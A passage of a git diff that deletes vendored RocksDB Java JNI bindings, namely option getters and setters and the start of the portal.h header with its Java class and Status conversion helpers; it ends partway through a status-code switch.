- * Method:    skipStatsUpdateOnDbOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_skipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->skip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalRecoveryMode
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setWalRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jwal_recovery_mode_value) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->wal_recovery_mode =
-      rocksdb::WALRecoveryModeJni::toCppWALRecoveryMode(
-          jwal_recovery_mode_value);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walRecoveryMode
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_walRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return rocksdb::WALRecoveryModeJni::toJavaWALRecoveryMode(
-      opt->wal_recovery_mode);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllow2pc
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllow2pc(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_2pc) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->allow_2pc = static_cast<bool>(jallow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allow2pc
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allow2pc(JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->allow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRowCache
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRowCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrow_cache_handle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  auto* row_cache = reinterpret_cast<std::shared_ptr<rocksdb::Cache>*>(jrow_cache_handle);
-  opt->row_cache = *row_cache;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setFailIfOptionsFileError
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setFailIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jfail_if_options_file_error) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->fail_if_options_file_error =
-      static_cast<bool>(jfail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    failIfOptionsFileError
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_failIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->fail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDumpMallocStats
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setDumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jdump_malloc_stats) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->dump_malloc_stats = static_cast<bool>(jdump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dumpMallocStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_dumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->dump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAvoidFlushDuringRecovery
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAvoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_recovery) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->avoid_flush_during_recovery = static_cast<bool>(javoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    avoidFlushDuringRecovery
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_avoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAvoidFlushDuringShutdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAvoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_shutdown) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->avoid_flush_during_shutdown = static_cast<bool>(javoid_flush_during_shutdown);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    avoidFlushDuringShutdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_avoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_shutdown);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::WriteOptions
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    newWriteOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteOptions_newWriteOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::WriteOptions();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    disposeInternal
- * Signature: ()V
- */
-void Java_org_rocksdb_WriteOptions_disposeInternal(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(jhandle);
-  assert(write_options != nullptr);
-  delete write_options;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setSync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setSync(
-  JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jflag) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->sync = jflag;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    sync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_sync(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->sync;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setDisableWAL
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setDisableWAL(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jflag) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->disableWAL = jflag;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    disableWAL
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_disableWAL(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->disableWAL;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setIgnoreMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setIgnoreMissingColumnFamilies(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle,
-    jboolean jignore_missing_column_families) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->
-      ignore_missing_column_families =
-          static_cast<bool>(jignore_missing_column_families);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    ignoreMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_ignoreMissingColumnFamilies(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->
-      ignore_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setNoSlowdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setNoSlowdown(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jno_slowdown) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->no_slowdown =
-      static_cast<bool>(jno_slowdown);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    noSlowdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_noSlowdown(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->no_slowdown;
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::ReadOptions
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    newReadOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ReadOptions_newReadOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* read_options = new rocksdb::ReadOptions();
-  return reinterpret_cast<jlong>(read_options);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ReadOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* read_options = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  assert(read_options != nullptr);
-  delete read_options;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setVerifyChecksums
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setVerifyChecksums(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jverify_checksums) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->verify_checksums =
-      static_cast<bool>(jverify_checksums);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    verifyChecksums
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_verifyChecksums(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(
-      jhandle)->verify_checksums;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setFillCache
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setFillCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jfill_cache) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->fill_cache =
-      static_cast<bool>(jfill_cache);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    fillCache
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_fillCache(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->fill_cache;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setTailing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setTailing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jtailing) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->tailing =
-      static_cast<bool>(jtailing);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    tailing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_tailing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->tailing;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    managed
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_managed(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->managed;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setManaged
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setManaged(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jmanaged) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->managed =
-      static_cast<bool>(jmanaged);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    totalOrderSeek
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_totalOrderSeek(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->total_order_seek;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setTotalOrderSeek
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setTotalOrderSeek(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jtotal_order_seek) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->total_order_seek =
-      static_cast<bool>(jtotal_order_seek);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    prefixSameAsStart
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_prefixSameAsStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->prefix_same_as_start;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setPrefixSameAsStart
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setPrefixSameAsStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jprefix_same_as_start) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->prefix_same_as_start =
-      static_cast<bool>(jprefix_same_as_start);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    pinData
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_pinData(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->pin_data;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setPinData
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setPinData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jpin_data) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->pin_data =
-      static_cast<bool>(jpin_data);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    backgroundPurgeOnIteratorCleanup
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_backgroundPurgeOnIteratorCleanup(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jboolean>(opt->background_purge_on_iterator_cleanup);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setBackgroundPurgeOnIteratorCleanup
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setBackgroundPurgeOnIteratorCleanup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jbackground_purge_on_iterator_cleanup) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->background_purge_on_iterator_cleanup =
-      static_cast<bool>(jbackground_purge_on_iterator_cleanup);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    readaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ReadOptions_readaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jlong>(opt->readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ReadOptions_setReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jreadahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->readahead_size = static_cast<size_t>(jreadahead_size);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    ignoreRangeDeletions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_ignoreRangeDeletions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jboolean>(opt->ignore_range_deletions);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setIgnoreRangeDeletions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setIgnoreRangeDeletions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jignore_range_deletions) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->ignore_range_deletions = static_cast<bool>(jignore_range_deletions);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setSnapshot
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ReadOptions_setSnapshot(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsnapshot) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->snapshot =
-      reinterpret_cast<rocksdb::Snapshot*>(jsnapshot);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    snapshot
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ReadOptions_snapshot(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto& snapshot =
-      reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->snapshot;
-  return reinterpret_cast<jlong>(snapshot);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    readTier
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ReadOptions_readTier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->read_tier);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setReadTier
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ReadOptions_setReadTier(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jread_tier) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->read_tier =
-      static_cast<rocksdb::ReadTier>(jread_tier);
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::ComparatorOptions
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    newComparatorOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ComparatorOptions_newComparatorOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* comparator_opt = new rocksdb::ComparatorJniCallbackOptions();
-  return reinterpret_cast<jlong>(comparator_opt);
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ComparatorOptions_useAdaptiveMutex(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle)
-    ->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ComparatorOptions_setUseAdaptiveMutex(
-    JNIEnv * env, jobject jobj, jlong jhandle, jboolean juse_adaptive_mutex) {
-  reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle)
-    ->use_adaptive_mutex = static_cast<bool>(juse_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ComparatorOptions_disposeInternal(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  auto* comparator_opt =
-      reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle);
-  assert(comparator_opt != nullptr);
-  delete comparator_opt;
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::FlushOptions
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    newFlushOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_FlushOptions_newFlushOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* flush_opt = new rocksdb::FlushOptions();
-  return reinterpret_cast<jlong>(flush_opt);
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    setWaitForFlush
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_FlushOptions_setWaitForFlush(
-    JNIEnv * env, jobject jobj, jlong jhandle, jboolean jwait) {
-  reinterpret_cast<rocksdb::FlushOptions*>(jhandle)
-    ->wait = static_cast<bool>(jwait);
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    waitForFlush
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_FlushOptions_waitForFlush(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::FlushOptions*>(jhandle)
-    ->wait;
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_FlushOptions_disposeInternal(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  auto* flush_opt = reinterpret_cast<rocksdb::FlushOptions*>(jhandle);
-  assert(flush_opt != nullptr);
-  delete flush_opt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/portal.h b/thirdparty/rocksdb/java/rocksjni/portal.h
deleted file mode 100644
index ed671ce..0000000
--- a/thirdparty/rocksdb/java/rocksjni/portal.h
+++ /dev/null
@@ -1,3341 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// This file is designed for caching those frequently used IDs and provide
-// efficient portal (i.e, a set of static functions) to access java code
-// from c++.
-
-#ifndef JAVA_ROCKSJNI_PORTAL_H_
-#define JAVA_ROCKSJNI_PORTAL_H_
-
-#include <jni.h>
-#include <functional>
-#include <iostream>
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/loggerjnicallback.h"
-#include "rocksjni/writebatchhandlerjnicallback.h"
-
-// Remove macro on windows
-#ifdef DELETE
-#undef DELETE
-#endif
-
-namespace rocksdb {
-
-// Detect if jlong overflows size_t
-inline Status check_if_jlong_fits_size_t(const jlong& jvalue) {
-  Status s = Status::OK();
-  if (static_cast<uint64_t>(jvalue) > std::numeric_limits<size_t>::max()) {
-    s = Status::InvalidArgument(Slice("jlong overflows 32 bit value."));
-  }
-  return s;
-}
-
-class JavaClass {
- public:
-  /**
-   * Gets and initializes a Java Class
-   *
-   * @param env A pointer to the Java environment
-   * @param jclazz_name The fully qualified JNI name of the Java Class
-   *     e.g. "java/lang/String"
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env, const char* jclazz_name) {
-    jclass jclazz = env->FindClass(jclazz_name);
-    assert(jclazz != nullptr);
-    return jclazz;
-  }
-};
-
-// Native class template
-template<class PTR, class DERIVED> class RocksDBNativeClass : public JavaClass {
-};
-
-// Native class template for sub-classes of RocksMutableObject
-template<class PTR, class DERIVED> class NativeRocksMutableObject
-    : public RocksDBNativeClass<PTR, DERIVED> {
- public:
-
-  /**
-   * Gets the Java Method ID for the
-   * RocksMutableObject#setNativeHandle(long, boolean) method
-   *
-   * @param env A pointer to the Java environment
-   * @return The Java Method ID or nullptr the RocksMutableObject class cannot
-   *     be accessed, or if one of the NoSuchMethodError,
-   *     ExceptionInInitializerError or OutOfMemoryError exceptions is thrown
-   */
-  static jmethodID getSetNativeHandleMethod(JNIEnv* env) {
-    static jclass jclazz = DERIVED::getJClass(env);
-    if(jclazz == nullptr) {
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(
-        jclazz, "setNativeHandle", "(JZ)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Sets the C++ object pointer handle in the Java object
-   *
-   * @param env A pointer to the Java environment
-   * @param jobj The Java object on which to set the pointer handle
-   * @param ptr The C++ object pointer
-   * @param java_owns_handle JNI_TRUE if ownership of the C++ object is
-   *     managed by the Java object
-   *
-   * @return true if a Java exception is pending, false otherwise
-   */
-  static bool setHandle(JNIEnv* env, jobject jobj, PTR ptr,
-      jboolean java_owns_handle) {
-    assert(jobj != nullptr);
-    static jmethodID mid = getSetNativeHandleMethod(env);
-    if(mid == nullptr) {
-      return true;  // signal exception
-    }
-
-    env->CallVoidMethod(jobj, mid, reinterpret_cast<jlong>(ptr), java_owns_handle);
-    if(env->ExceptionCheck()) {
-      return true;  // signal exception
-    }
-
-    return false;
-  }
-};
-
-// Java Exception template
-template<class DERIVED> class JavaException : public JavaClass {
- public:
-  /**
-   * Create and throw a java exception with the provided message
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg) {
-    jclass jclazz = DERIVED::getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "JavaException::ThrowNew - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    const jint rs = env->ThrowNew(jclazz, msg.c_str());
-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "JavaException::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    return true;
-  }
-};
-
-// The portal class for org.rocksdb.RocksDB
-class RocksDBJni : public RocksDBNativeClass<rocksdb::DB*, RocksDBJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksDB
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/RocksDB");
-  }
-};
-
-// The portal class for org.rocksdb.Status
-class StatusJni : public RocksDBNativeClass<rocksdb::Status*, StatusJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Status
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Status");
-  }
-
-  /**
-   * Create a new Java org.rocksdb.Status object with the same properties as
-   * the provided C++ rocksdb::Status object
-   *
-   * @param env A pointer to the Java environment
-   * @param status The rocksdb::Status object
-   *
-   * @return A reference to a Java org.rocksdb.Status object, or nullptr
-   *     if an an exception occurs
-   */
-  static jobject construct(JNIEnv* env, const Status& status) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(BBLjava/lang/String;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      return nullptr;
-    }
-
-    // convert the Status state for Java
-    jstring jstate = nullptr;
-    if (status.getState() != nullptr) {
-      const char* const state = status.getState();
-      jstate = env->NewStringUTF(state);
-      if(env->ExceptionCheck()) {
-        if(jstate != nullptr) {
-          env->DeleteLocalRef(jstate);
-        }
-        return nullptr;
-      }
-    }
-
-    jobject jstatus =
-        env->NewObject(jclazz, mid, toJavaStatusCode(status.code()),
-            toJavaStatusSubCode(status.subcode()), jstate);
-    if(env->ExceptionCheck()) {
-      // exception occurred
-      if(jstate != nullptr) {
-        env->DeleteLocalRef(jstate);
-      }
-      return nullptr;
-    }
-
-    if(jstate != nullptr) {
-      env->DeleteLocalRef(jstate);
-    }
-
-    return jstatus;
-  }
-
-  // Returns the equivalent org.rocksdb.Status.Code for the provided
-  // C++ rocksdb::Status::Code enum
-  static jbyte toJavaStatusCode(const rocksdb::Status::Code& code) {
-    switch (code) {
-      case rocksdb::Status::Code::kOk:
-        return 0x0;
-      case rocksdb::Status::Code::kNotFound:
-        return 0x1;
-      case rocksdb::Status::Code::kCorruption:
-        return 0x2;
-      case rocksdb::Status::Code::kNotSupported:
-        return 0x3;
-      case rocksdb::Status::Code::kInvalidArgument:
-        return 0x4;
-      case rocksdb::Status::Code::kIOError:
-        return 0x5;
-      case rocksdb::Status::Code::kMergeInProgress:
-        return 0x6;
-      case rocksdb::Status::Code::kIncomplete:
-        return 0x7;
-      case rocksdb::Status::Code::kShutdownInProgress:
-        return 0x8;
-      case rocksdb::Status::Code::kTimedOut:
-        return 0x9;
-      case rocksdb::Status::Code::kAborted:
-        return 0xA;
-      case rocksdb::Status::Code::kBusy:
-        return 0xB;
-      case rocksdb::Status::Code::kExpired:
-        return 0xC;
